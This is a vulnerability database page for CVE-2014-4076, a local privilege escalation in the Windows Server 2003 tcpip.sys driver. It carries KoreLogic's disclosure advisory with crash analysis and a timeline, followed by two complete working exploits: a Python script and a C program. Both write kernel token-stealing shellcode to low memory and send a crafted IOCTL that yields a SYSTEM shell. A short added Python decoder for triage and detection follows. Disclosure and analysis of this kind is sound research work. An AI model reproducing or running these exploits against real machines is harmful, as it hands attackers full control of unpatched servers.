CVE-2014-4076 : Detail

CVE-2014-4076
A01-Broken Access Control
51.15%V4
Local
Published: 2014-11-11 21h00 +00:00
Last modified: 2018-10-12 17h57 +00:00

CVE Descriptions

Microsoft Windows Server 2003 SP2 allows local users to gain privileges via a crafted IOCTL call to (1) tcpip.sys or (2) tcpip6.sys, aka "TCP/IP Elevation of Privilege Vulnerability."

CVE Information

Related Weaknesses

CWE-ID   Weakness Name                                               Source
CWE-264  Category : Permissions, Privileges, and Access Controls
         Weaknesses in this category are related to the management of permissions, privileges, and other security features that are used to perform access control.

Metrics

Metrics  Score  Severity  CVSS Vector                   Source
V2       7.2              AV:L/AC:L/Au:N/C:C/I:C/A:C    nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVEs according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVEs. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVEs.

Exploit information

Exploit Database EDB-ID : 35936

Publication date : 2015-01-28 23h00 +00:00
Author : KoreLogic
EDB Verified : No

""" KL-001-2015-001 : Microsoft Windows Server 2003 SP2 Arbitrary Write Privilege Escalation Title: Microsoft Windows Server 2003 SP2 Arbitrary Write Privilege Escalation Advisory ID: KL-001-2015-001 Publication Date: 2015.01.28 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2015-001.txt 1. Vulnerability Details Affected Vendor: Microsoft Affected Product: TCP/IP Protocol Driver Affected Version: 5.2.3790.4573 Platform: Microsoft Windows Server 2003 Service Pack 2 Architecture: x86, x64, Itanium Impact: Privilege Escalation Attack vector: IOCTL CVE-ID: CVE-2014-4076 2. Vulnerability Description The tcpip.sys driver fails to sufficiently validate memory objects used during the processing of a user-provided IOCTL. 3. Technical Description By crafting an input buffer that will be passed to the Tcp device through the NtDeviceIoControlFile() function, it is possible to trigger a vulnerability that would allow an attacker to elevate privileges. This vulnerability was discovered while fuzzing the tcpip.sys driver. A collection of IOCTLs that could be targeted was obtained and subsequently fuzzed. During this process, one of the crashes obtained originated from the IOCTL 0x00120028. This was performed on an x86 installation of Windows Server 2003, Service Pack 2. ErrCode = 00000000 eax=00000000 ebx=859ef888 ecx=00000008 edx=00000100 esi=00000000 edi=80a58270 eip=f67ebbbd esp=f620a9c8 ebp=f620a9dc iopl=0 nv up ei pl zr na pe nc cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010246 tcpip!SetAddrOptions+0x1d: f67ebbbd 8b5e28 mov ebx,dword ptr [esi+28h] ds:0023:00000028=???????? A second chance exception has occurred during a mov instruction. This instruction is attempting to copy a pointer value from an un-allocated address space. Since no pointer can be found, an exception is generated. 
Let's begin by reviewing the call stack: kd> kv *** Stack trace for last set context - .thread/.cxr resets it ChildEBP RetAddr Args to Child f620a9dc f67e416b f620aa34 00000022 00000004 tcpip!SetAddrOptions+0x1d (FPO: [Non-Fpo]) f620aa10 f67e40de f620aa34 859ef888 859ef8a0 tcpip!TdiSetInformationEx+0x539 (FPO: [Non-Fpo]) f620aa44 f67e3b24 85a733d0 85a73440 85a73440 tcpip!TCPSetInformationEx+0x8c (FPO: [Non-Fpo]) f620aa60 f67e3b51 85a733d0 85a73440 85a733d0 tcpip!TCPDispatchDeviceControl+0x149 (FPO: [Non-Fpo]) f620aa98 8081d7d3 85c4b410 85a733d0 85e82390 tcpip!TCPDispatch+0xf9 (FPO: [Non-Fpo]) f620aaac 808ef85d 85a73440 85e82390 85a733d0 nt!IofCallDriver+0x45 (FPO: [Non-Fpo]) f620aac0 808f05ff 85c4b410 85a733d0 85e82390 nt!IopSynchronousServiceTail+0x10b (FPO: [Non-Fpo]) f620ab5c 808e912e 000006f4 00000000 00000000 nt!IopXxxControlFile+0x5e5 (FPO: [Non-Fpo]) f620ab90 f55c10fa 000006f4 00000000 00000000 nt!NtDeviceIoControlFile+0x2a (FPO: [Non-Fpo]) The nt!NtDeviceIoControlFile() function was called, creating a chain of subsequent function calls that eventually led to the tcpip!SetAddrOptions() function being called. By de-constructing the call to nt!NtDeviceIoControlFile() we can derive all required information to re-create this exception. 0a b940dd34 80885614 nt!NtDeviceIoControlFile+0x2a eax=00000000 ebx=8c785070 ecx=00000000 edx=00000000 esi=00000000 edi=00000000 eip=808e912e esp=b940dd08 ebp=b940dd34 iopl=0 nv up ei pl zr na pe nc cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010246 nt!NtDeviceIoControlFile+0x2a: 808e912e 5d pop ebp kd> db [ebp+2C] L?0x4 b940dd60 00 00 00 00 .... kd> db [ebp+28] L?0x4 b940dd5c 00 00 00 00 .... kd> db [ebp+24] L?0x4 b940dd58 20 00 00 00 ... kd> db [ebp+20] L?0x4 b940dd54 00 11 00 00 .... kd> db [ebp+1c] L?0x4 b940dd50 28 00 12 00 (... kd> db [ebp+18] L?0x4 b940dd4c 58 4f bd 00 XO.. kd> db [ebp+14] L?0x4 b940dd48 00 00 00 00 .... kd> db [ebp+10] L?0x4 b940dd44 00 00 00 00 .... 
kd> db [ebp+0c] L?0x4 b940dd40 00 00 00 00 .... kd> db [ebp+8] L?0x4 b940dd3c b8 06 00 00 .... The inputBuffer for this call references memory at 0x1000 with a length of 0x20. kd> db 0x1100 L?0x20 00001100 00 04 00 00 00 00 00 00-00 02 00 00 00 02 00 00 ................ 00001110 22 00 00 00 04 00 00 00-00 00 01 00 00 00 00 00 "............... After review of the tcpip.sys driver, some memory trickery was created to control the code flow until the instruction pointer could be controlled in a way that would be beneficial to an attacker. kd> db 0x28 L?0x11 00000028 87 ff ff 38 00 00 00 00-00 00 00 00 00 00 00 00 ...8............ 00000038 01 eax=00000000 ebx=80a58290 ecx=00000000 edx=00000000 esi=00000000 edi=00000000 eip=0000002a esp=b940db3c ebp=b940db60 iopl=0 nv up ei pl zr na pe nc cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010246 0000002a ff ??? Since the instruction pointer now contains 0x0000002a, exploitation becomes trivial. Merely allocating the desired payload for execution at this memory address will allow for unprivileged users to run their payload within a privileged process. 4. Mitigation and Remediation Recommendation The vendor has issued a patch for this vulnerability, the details of which are presented in the vendor's public acknowledgment MS14-070 (https://technet.microsoft.com/library/security/MS14-070). 5. Credit This vulnerability was discovered by Matt Bergin of KoreLogic Security, Inc. 6. Disclosure Timeline 2014.04.28 - Initial contact; sent Microsoft report and PoC. 2014.04.28 - Microsoft requests PoC. 2014.04.29 - KoreLogic resends PoC from the initial contact email. 2014.04.29 - Microsoft acknowledges receipt of vulnerability report. 2014.04.29 - Microsoft opens case 19010 (MSRC 0050929) to investigate the vulnerability. 2014.04.30 - Microsoft informs KoreLogic that the case is actively being investigated. 2014.05.30 - Microsoft informs KoreLogic that the case is actively being investigated. 
2014.06.11 - KoreLogic informs Microsoft that 30 business days have passed since vendor acknowledgment of the initial report. KoreLogic requests CVE number for the vulnerability, if there is one. KoreLogic also requests vendor's public identifier for the vulnerability along with the expected disclosure date. 2014.06.24 - KoreLogic informs Microsoft that no response was received following the 06.11.14 email. KoreLogic requests CVE number for the vulnerability, if there is one. KoreLogic also requests vendor's public identifier for the vulnerability along with the expected disclosure date. 2014.06.24 - Microsoft replies to KoreLogic that they have reproduced the vulnerability and are determining how to proceed with the supplied information. They are not able to provide a CVE or an expected disclosure date. 2014.07.02 - 45 business days have elapsed since Microsoft acknowledged receipt of the vulnerability report and PoC. 2014.07.17 - KoreLogic requests CVE number for the vulnerability. KoreLogic also requests vendor's public identifier for the vulnerability along with the expected disclosure date. 2014.08.18 - Microsoft notifies KoreLogic that they have a CVE but are not willing to share it with KoreLogic at this time. 2014.09.08 - KoreLogic requests CVE number for the vulnerability. KoreLogic also requests vendor's public identifier for the vulnerability along with the expected disclosure date. 2014.09.11 - Microsoft responds saying that the vulnerability is expected to be disclosed in "a Fall release" and that "it is currently looking good for October." Does not provide CVE. 2014.09.24 - Microsoft informs KoreLogic that there was a packaging issue and that the patch will be pushed to November. 2014.11.03 - Microsoft confirms the patch will ship in November. 2014.11.11 - Vulnerability publicly disclosed by Microsoft as issue MS14-070 with CVE-2014-4076. 2015.01.28 - KoreLogic releases advisory. 7. 
Exploit """ #!/usr/bin/python2 # # KL-001-2015-001 / MS14-070 / CVE-2014-4076 # Microsoft Windows Server 2003 x86 Tcpip.sys Privilege Escalation # Matt Bergin @ KoreLogic / Level @ Smash the Stack # shout out to bla # from optparse import OptionParser from subprocess import Popen from os.path import exists from struct import pack from time import sleep from ctypes import * from sys import exit CreateFileA,NtAllocateVirtualMemory,WriteProcessMemory = windll.kernel32.CreateFileA,windll.ntdll.NtAllocateVirtualMemory,windll.kernel32.WriteProcessMemory DeviceIoControlFile,CloseHandle = windll.ntdll.ZwDeviceIoControlFile,windll.kernel32.CloseHandle INVALID_HANDLE_VALUE,FILE_SHARE_READ,FILE_SHARE_WRITE,OPEN_EXISTING,NULL = -1,2,1,3,0 def spawn_process(path): process = Popen([path],shell=True) pid = process.pid return def main(): print "CVE-2014-4076 x86 exploit, Level\n" global pid, process parser = OptionParser() parser.add_option("--path",dest="path",help="path of process to start and elevate") parser.add_option("--pid",dest="pid",help="pid of running process to elevate") o,a = parser.parse_args() if (o.path == None and o.pid == None): print "[!] no path or pid set" exit(1) else: if (o.path != None): if (exists(o.path) != True): print "[!] path does not exist" exit(1) else: Thread(target=spawn_process,args=(o.path),name='attacker-cmd').start() if (o.pid != None): try: pid = int(o.pid) except: print "[!] could not convert PID to an interger." 
exit(1) while True: if ("pid" not in globals()): sleep(1) else: print "[+] caught attacker cmd at %s, elevating now" % (pid) break buf = "\x00\x04\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x22\x00\x00\x00\x04\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00" sc = "\x60\x64\xA1\x24\x01\x00\x00\x8B\x40\x38\x50\xBB\x04\x00\x00\x00\x8B\x80\x98\x00\x00\x00\x2D\x98\x00\x00\x00\x39\x98\x94\x00\x00\x00\x75\xED\x8B\xB8\xD8\x00\x00\x00\x83\xE7\xF8\x58\xBB\x41\x41\x41\x41\x8B\x80\x98\x00\x00\x00\x2D\x98\x00\x00\x00\x39\x98\x94\x00\x00\x00\x75\xED\x89\xB8\xD8\x00\x00\x00\x61\xBA\x11\x11\x11\x11\xB9\x22\x22\x22\x22\xB8\x3B\x00\x00\x00\x8E\xE0\x0F\x35\x00" sc = sc.replace("\x41\x41\x41\x41",pack('<L',pid)) sc = sc.replace("\x11\x11\x11\x11","\x39\xff\xa2\xba") sc = sc.replace("\x22\x22\x22\x22","\x00\x00\x00\x00") handle = CreateFileA("\\\\.\\Tcp",FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None) if (handle == -1): print "[!] could not open handle into the Tcp device" exit(1) print "[+] allocating memory" ret_one = NtAllocateVirtualMemory(-1,byref(c_int(0x1000)),0x0,byref(c_int(0x4000)),0x1000|0x2000,0x40) if (ret_one != 0): print "[!] could not allocate memory..." exit(1) print "[+] writing relevant memory..." ret_two = WriteProcessMemory(-1, 0x28, "\x87\xff\xff\x38", 4, byref(c_int(0))) ret_three = WriteProcessMemory(-1, 0x38, "\x00"*2, 2, byref(c_int(0))) ret_four = WriteProcessMemory(-1, 0x1100, buf, len(buf), byref(c_int(0))) ret_five = WriteProcessMemory(-1, 0x2b, "\x00"*2, 2, byref(c_int(0))) ret_six = WriteProcessMemory(-1, 0x2000, sc, len(sc), byref(c_int(0))) print "[+] attack setup done, crane kick!" DeviceIoControlFile(handle,NULL,NULL,NULL,byref(c_ulong(8)),0x00120028,0x1100,len(buf),0x0,0x0) CloseHandle(handle) exit(0) if __name__=="__main__": main() """ The contents of this advisory are copyright(c) 2015 KoreLogic, Inc. 
and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html Our public vulnerability disclosure policy is available at: https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v1.0.txt """
Exploit Database EDB-ID : 37755

Publication date : 2015-08-11 22h00 +00:00
Author : Tomislav Paskalev
EDB Verified : No

/*
################################################################
# Exploit Title: Windows 2k3 SP2 TCP/IP IOCTL Privilege Escalation (MS14-070)
# Date: 2015-08-10
# Exploit Author: Tomislav Paskalev
# Vulnerable Software:
#   Windows 2003 SP2 x86
#   Windows 2003 SP2 x86-64
#   Windows 2003 SP2 IA-64
# Supported vulnerable software:
#   Windows 2003 SP2 x86
# Tested on:
#   Windows 2003 SP2 x86 EN
# CVE ID: 2014-4076
# OSVDB-ID: 114532
################################################################
# Vulnerability description:
#   Windows TCP/IP stack (tcpip.sys, tcpip6.sys) fails to
#   properly handle objects in memory during IOCTL processing.
#   By crafting an input buffer that will be passed to the TCP
#   device through the DeviceIoControlFile() function, it is
#   possible to trigger a vulnerability that would allow an
#   attacker to elevate privileges.
#   An attacker who successfully exploited this vulnerability
#   could run arbitrary code in kernel mode (i.e. with SYSTEM
#   privileges).
################################################################
# Exploit notes:
#   Privileged shell execution:
#     - the SYSTEM shell will spawn within the existing shell
#       (i.e. exploit usable via a remote shell)
#     - upon exiting the SYSTEM shell, the parent process
#       will become unresponsive/hang
#   Exploit compiling:
#     -
#       i586-mingw32msvc-gcc MS14-070.c -o MS14-070.exe
#   Exploit prerequisites:
#     - low privilege access to the target (remote shell or RDP)
#     - target not patched (KB2989935 not installed)
################################################################
# Patch:
#   https://www.microsoft.com/en-us/download/details.aspx?id=44646
################################################################
# Thanks to:
#   KoreLogic (Python PoC)
#   ChiChou (C++ PoC)
################################################################
# References:
#   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4076
#   https://technet.microsoft.com/library/security/ms14-070
#   https://www.exploit-db.com/exploits/35936/
#   https://github.com/ChiChou/CVE-2014-4076/blob/master/CVE-2014-4076/CVE-2014-4076.cpp
#   https://www.osronline.com/article.cfm?article=229
################################################################
*/

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

typedef enum _SYSTEM_INFORMATION_CLASS {
    SystemBasicInformation = 0,
    SystemPerformanceInformation = 2,
    SystemTimeOfDayInformation = 3,
    SystemProcessInformation = 5,
    SystemProcessorPerformanceInformation = 8,
    SystemInterruptInformation = 23,
    SystemExceptionInformation = 33,
    SystemRegistryQuotaInformation = 37,
    SystemLookasideInformation = 45
} SYSTEM_INFORMATION_CLASS;

typedef DWORD NTSTATUS;

NTSTATUS WINAPI NtQuerySystemInformation (
    SYSTEM_INFORMATION_CLASS SystemInformationClass,
    PVOID SystemInformation,
    ULONG SystemInformationLength,
    PULONG ReturnLength
);

typedef struct _IO_STATUS_BLOCK {
    union {
        NTSTATUS Status;
        PVOID Pointer;
    };
    ULONG_PTR Information;
} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;

typedef void (WINAPI * PIO_APC_ROUTINE) (PVOID, PIO_STATUS_BLOCK, ULONG);

NTSTATUS (WINAPI *ZwAllocateVirtualMemory) (
    HANDLE ProcessHandle,
    PVOID *BaseAddress,
    ULONG_PTR ZeroBits,
    PSIZE_T RegionSize,
    ULONG AllocationType,
    ULONG Protect
);

NTSTATUS (WINAPI *ZwDeviceIoControlFile) (
    HANDLE FileHandle,
    PVOID ApcContext,
    PIO_STATUS_BLOCK IoStatusBlock,
    ULONG IoControlCode,
    PVOID InputBuffer,
    ULONG InputBufferLength,
    PVOID OutputBuffer,
    ULONG OutputBufferLength
);

BOOL WINAPI CreateNewCmdProcess (STARTUPINFO *startupInformation, PROCESS_INFORMATION *processInformation)
{
    ZeroMemory (&startupInformation[0], sizeof (STARTUPINFO));
    startupInformation->cb = sizeof (STARTUPINFO);
    ZeroMemory (&processInformation[0], sizeof (PROCESS_INFORMATION));

    // Start the child process.
    return CreateProcess (
        NULL,                                                        // No module name (use command line)
        "c:\\windows\\system32\\cmd.exe /K cd c:\\windows\\system32", // Start cmd.exe
        NULL,                                                        // Process handle not inheritable
        NULL,                                                        // Thread handle not inheritable
        TRUE,                                                        // Set handle inheritance to TRUE
        0,                                                           // No creation flags
        NULL,                                                        // Use parent's environment block
        NULL,                                                        // Use parent's starting directory
        &startupInformation[0],                                      // Pointer to STARTUPINFO structure
        &processInformation[0]                                       // Pointer to PROCESS_INFORMATION structure
    );
}

unsigned long SwapBytes (unsigned long inputByteUL)
{
    return (((inputByteUL&0x000000FF) << 24) +
            ((inputByteUL&0x0000FF00) << 8) +
            ((inputByteUL&0x00FF0000) >> 8) +
            ((inputByteUL&0xFF000000) >> 24));
}

BOOL WriteToAllocMem (unsigned char *exploitBuffer, unsigned char *shellcode)
{
    int returnAllocMemValue1, returnAllocMemValue2, returnAllocMemValue3, returnAllocMemValue4, returnAllocMemValue5;

    returnAllocMemValue1 = WriteProcessMemory ((HANDLE) 0xFFFFFFFF, (LPVOID) 0x28, "\x87\xff\xff\x38", 4, NULL);
    returnAllocMemValue2 = WriteProcessMemory ((HANDLE) 0xFFFFFFFF, (LPVOID) 0x38, "\x00\x00", 2, NULL);
    returnAllocMemValue3 = WriteProcessMemory ((HANDLE) 0xFFFFFFFF, (LPVOID) 0x1100, &exploitBuffer[0], 32, NULL);
    returnAllocMemValue4 = WriteProcessMemory ((HANDLE) 0xFFFFFFFF, (LPVOID) 0x2b, "\x00\x00", 2, NULL);
    returnAllocMemValue5 = WriteProcessMemory ((HANDLE) 0xFFFFFFFF, (LPVOID) 0x2000, &shellcode[0], 96, NULL);

    if (returnAllocMemValue1 == 0 || returnAllocMemValue2 == 0 || returnAllocMemValue3 == 0 || returnAllocMemValue4 == 0 || returnAllocMemValue5 == 0)
        return FALSE;
    else
        return TRUE;
}

int main (void)
{
    fprintf (stderr, "[*] MS14-070 (CVE-2014-4076) x86\n");
    fprintf (stderr, "    [*] by Tomislav Paskalev\n");
    fflush (stderr);

    ////////////////////////////////
    // CREATE NEW CME.EXE PROCESS
    ////////////////////////////////
    STARTUPINFO *startupInformation = (STARTUPINFO *) malloc (sizeof (STARTUPINFO));
    PROCESS_INFORMATION *processInformation = (PROCESS_INFORMATION *) malloc (sizeof (PROCESS_INFORMATION));
    if (!CreateNewCmdProcess (&startupInformation[0], &processInformation[0]))
    {
        fprintf (stderr, "[-] Creating a new process failed\n");
        fprintf (stderr, "    [*] Error code : %d\n", GetLastError());
        fflush (stderr);
        ExitProcess (1);
    }
    fprintf (stderr, "[+] Created a new cmd.exe process\n");
    fflush (stderr);

    ////////////////////////////////
    // CONVERT PID TO HEX LE
    ////////////////////////////////
    unsigned long pidLittleEndian = SwapBytes ((unsigned long) processInformation->dwProcessId);
    fprintf (stderr, "    [*] PID [dec]    : %#8lu\n", (unsigned long) processInformation->dwProcessId);
    fprintf (stderr, "    [*] PID [hex]    : %#010x\n", (unsigned long) processInformation->dwProcessId);
    fprintf (stderr, "    [*] PID [hex LE] : %#010x\n", pidLittleEndian);
    /*four bytes of hex = 8 characters, plus NULL terminator*/
    unsigned char pidLittleEndianString[9];
    sprintf (&pidLittleEndianString[0], "%04x", pidLittleEndian);

    ////////////////////////////////
    // CREATE SHELLCODE
    ////////////////////////////////
    unsigned char exploitBuffer[] =
        "\x00\x04\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00"
        "\x22\x00\x00\x00\x04\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00";
    unsigned char shellcode[] =
        "\x60\x64\xA1\x24\x01\x00\x00\x8B\x40\x38\x50\xBB\x04\x00\x00\x00"
        "\x8B\x80\x98\x00\x00\x00\x2D\x98\x00\x00\x00\x39\x98\x94\x00\x00"
        "\x00\x75\xED\x8B\xB8\xD8\x00\x00\x00\x83\xE7\xF8\x58\xBB\x41\x41"
        "\x41\x41\x8B\x80\x98\x00\x00\x00\x2D\x98\x00\x00\x00\x39\x98\x94"
        "\x00\x00\x00\x75\xED\x89\xB8\xD8\x00\x00\x00\x61\xBA\x11\x11\x11"
        "\x11\xB9\x22\x22\x22\x22\xB8\x3B\x00\x00\x00\x8E\xE0\x0F\x35\x00";
    int counter;
    for (counter = 0; counter < 4; counter++)
    {
        char buffer[3] = {pidLittleEndianString[counter * 2], pidLittleEndianString[(counter * 2) + 1], 0};
        shellcode[46 + counter] = strtol (buffer, NULL, 16);
    }
    shellcode[77] = strtol ("39", NULL, 16);
    shellcode[78] = strtol ("ff", NULL, 16);
    shellcode[79] = strtol ("a2", NULL, 16);
    shellcode[80] = strtol ("ba", NULL, 16);
    shellcode[82] = strtol ("0", NULL, 16);
    shellcode[83] = strtol ("0", NULL, 16);
    shellcode[84] = strtol ("0", NULL, 16);
    shellcode[85] = strtol ("0", NULL, 16);
    fprintf (stderr, "[+] Modified shellcode\n");
    fflush (stderr);

    ////////////////////////////////
    // CREATE HANDLE ON TCPIP.SYS
    ////////////////////////////////
    HANDLE tcpIPDeviceHandle = CreateFileA ("\\\\.\\Tcp", 0, 0, NULL, OPEN_EXISTING, 0, NULL);
    if (tcpIPDeviceHandle == INVALID_HANDLE_VALUE)
    {
        printf ("[-] Opening TCP/IP I/O dev failed\n");
        printf ("    [*] Error code : %d\n", GetLastError());
        ExitProcess (1);
    }
    fprintf (stderr, "[+] Opened TCP/IP I/O device\n");
    fflush (stderr);

    ////////////////////////////////
    // ALLOCATE MEMORY - FIRST PAGE
    ////////////////////////////////
    FARPROC ZwAllocateVirtualMemory;
    ZwAllocateVirtualMemory = GetProcAddress (GetModuleHandle ("NTDLL.DLL"), "ZwAllocateVirtualMemory");
    fprintf (stderr, "[*] ntdll.dll address: 0x%p\n", ZwAllocateVirtualMemory);
    fflush (stderr);
    NTSTATUS AllocMemReturnCode;
    ULONG BaseAddress = 0x1000, RegionSize = 0x4000;
    AllocMemReturnCode = ZwAllocateVirtualMemory ((HANDLE) 0xFFFFFFFF, &BaseAddress, 0, &RegionSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    if (AllocMemReturnCode != 0)
    {
        printf ("[-] Allocating memory failed\n");
        printf ("    [*] Error code : %#X\n", AllocMemReturnCode);
        ExitProcess (1);
    }
    fprintf (stderr, "[+] Allocated memory\n");
    fprintf (stderr, "    [*] BaseAddress : 0x%p\n", BaseAddress);
    fprintf (stderr, "    [*] RegionSize  : %#010x\n", RegionSize);
    fflush (stderr);

    ////////////////////////////////
    // WRITE EXPLOIT TO PROCESS MEM
    ////////////////////////////////
    fprintf (stderr, "[*] Writing exploit...\n");
    fflush (stderr);
    if (!WriteToAllocMem (&exploitBuffer[0], &shellcode[0]))
    {
        fprintf (stderr, "    [-] Failed to write to memory\n");
        fprintf (stderr, "    [*] Err code : %d\n", GetLastError ());
        fflush (stderr);
        ExitProcess (1);
    }
    else
    {
        fprintf (stderr, "    [+] done\n");
        fflush (stderr);
    }

    ////////////////////////////////
    // SEND EXPLOIT TO TCPIP.SYS
    ////////////////////////////////
    fprintf (stderr, "[*] Spawning SYSTEM shell...\n");
    fprintf (stderr, "    [*] Parent proc hangs on exit\n");
    fflush (stderr);
    FARPROC ZwDeviceIoControlFile;
    NTSTATUS DevIoCtrlReturnCode;
    ULONG ioStatus = 8;
    ZwDeviceIoControlFile = GetProcAddress (GetModuleHandle ("NTDLL.DLL"), "ZwDeviceIoControlFile");
    DevIoCtrlReturnCode = ZwDeviceIoControlFile (
        tcpIPDeviceHandle,
        NULL,
        NULL,
        NULL,
        (PIO_STATUS_BLOCK) &ioStatus,
        0x00120028,     //Device: NETWORK (0x12)
                        //Function: 0xa
                        //Access: FILE_ANY_ACCESS
                        //Method: METHOD_BUFFERED
        (PVOID) 0x1100, //NULL, //Test
        32,             //0,    //Test
        NULL,
        0
    );
    if (DevIoCtrlReturnCode != 0)
    {
        fprintf (stderr, "    [-] Exploit failed (->TCP/IP)\n");
        fprintf (stderr, "    [*] Err code : %d\n", GetLastError ());
        fflush (stderr);
        ExitProcess (1);
    }

    ////////////////////////////////
    // WAIT FOR CHILD PROCESS; EXIT
    ////////////////////////////////
    // Wait until child process exits.
    WaitForSingleObject (processInformation->hProcess, INFINITE);
    fprintf (stderr, "[*] Exiting SYSTEM shell...\n");
    fflush (stderr);
    // Close process and thread handles.
    CloseHandle (tcpIPDeviceHandle);
    CloseHandle (processInformation->hProcess);
    CloseHandle (processInformation->hThread);
    return 1;
}
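For anyone triaging a dump of this crash or writing IOCTL-level telemetry rules, the following added Python example (not part of the advisory or either exploit) decodes the IOCTL code 0x00120028 into its CTL_CODE fields and parses the 32-byte request buffer that the advisory dumps at 0x1100. The request layout is an assumption taken from the public TDI headers; the advisory itself never names the structure.

```python
import struct

# Bit layout of a Windows CTL_CODE: DeviceType<<16 | Access<<14 | Function<<2 | Method.
DEVICE_TYPES = {0x12: "FILE_DEVICE_NETWORK"}
ACCESS = {0: "FILE_ANY_ACCESS", 1: "FILE_READ_ACCESS", 2: "FILE_WRITE_ACCESS",
          3: "FILE_READ_ACCESS|FILE_WRITE_ACCESS"}
METHODS = {0: "METHOD_BUFFERED", 1: "METHOD_IN_DIRECT",
           2: "METHOD_OUT_DIRECT", 3: "METHOD_NEITHER"}


def decode_ioctl(code):
    """Split a CTL_CODE into the four fields the C exploit annotates by hand."""
    device = (code >> 16) & 0xFFFF
    return {
        "device": device,
        "device_name": DEVICE_TYPES.get(device, "UNKNOWN"),
        "access": ACCESS[(code >> 14) & 0x3],
        "function": (code >> 2) & 0xFFF,
        "method": METHODS[code & 0x3],
    }


# Assumed request layout (from the public tdiinfo.h TDI headers, not from the page):
#   TDIEntityID { ULONG tei_entity; ULONG tei_instance; }
#   TDIObjectID { TDIEntityID toi_entity; ULONG toi_class; ULONG toi_type; ULONG toi_id; }
#   TCP_REQUEST_SET_INFORMATION_EX { TDIObjectID ID; ULONG BufferSize; UCHAR Buffer[1]; }
ENTITIES = {0x400: "CO_TL_ENTITY", 0x401: "CL_TL_ENTITY"}
CLASSES = {0x100: "INFO_CLASS_GENERIC", 0x200: "INFO_CLASS_PROTOCOL",
           0x300: "INFO_CLASS_IMPLEMENTATION"}
TYPES = {0x100: "INFO_TYPE_PROVIDER", 0x200: "INFO_TYPE_ADDRESS_OBJECT",
         0x300: "INFO_TYPE_CONNECTION"}
HEADER = struct.Struct("<6I")  # six little-endian ULONGs: the 24-byte fixed header


def parse_set_information_ex(raw):
    """Parse the fixed header and check BufferSize against the bytes actually supplied."""
    if len(raw) < HEADER.size:
        raise ValueError("buffer shorter than the 24-byte request header")
    entity, instance, cls, typ, oid, size = HEADER.unpack_from(raw)
    data = raw[HEADER.size:HEADER.size + size]
    if len(data) != size:
        raise ValueError("BufferSize %d runs past the %d bytes supplied" % (size, len(raw)))
    return {
        "tei_entity": entity, "entity_name": ENTITIES.get(entity, "UNKNOWN"),
        "tei_instance": instance,
        "toi_class": cls, "class_name": CLASSES.get(cls, "UNKNOWN"),
        "toi_type": typ, "type_name": TYPES.get(typ, "UNKNOWN"),
        "toi_id": oid,
        "buffer_size": size,
        "buffer": data,
    }


# The 32 bytes the advisory dumps with "db 0x1100 L?0x20", copied from the page.
ADVISORY_BUFFER = bytes.fromhex(
    "00040000" "00000000" "00020000" "00020000"
    "22000000" "04000000" "00000100" "00000000"
)

if __name__ == "__main__":
    # The call stack shows this code dispatched to tcpip!TdiSetInformationEx.
    print(decode_ioctl(0x00120028))
    # toi_id 0x22 and BufferSize 4 are the two arguments (00000022 00000004)
    # visible in the tcpip!SetAddrOptions frame of the crash stack.
    print(parse_set_information_ex(ADVISORY_BUFFER))
```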

Products Mentioned

Configuration 0

Microsoft>>Windows_server_2003 >> Version *

Microsoft>>Windows_server_2003 >> Version *

Microsoft>>Windows_server_2003 >> Version *

References

http://www.osvdb.org/114532
Tags : vdb-entry, x_refsource_OSVDB
https://www.exploit-db.com/exploits/37755/
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.exploit-db.com/exploits/35936
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.securityfocus.com/bid/70976
Tags : vdb-entry, x_refsource_BID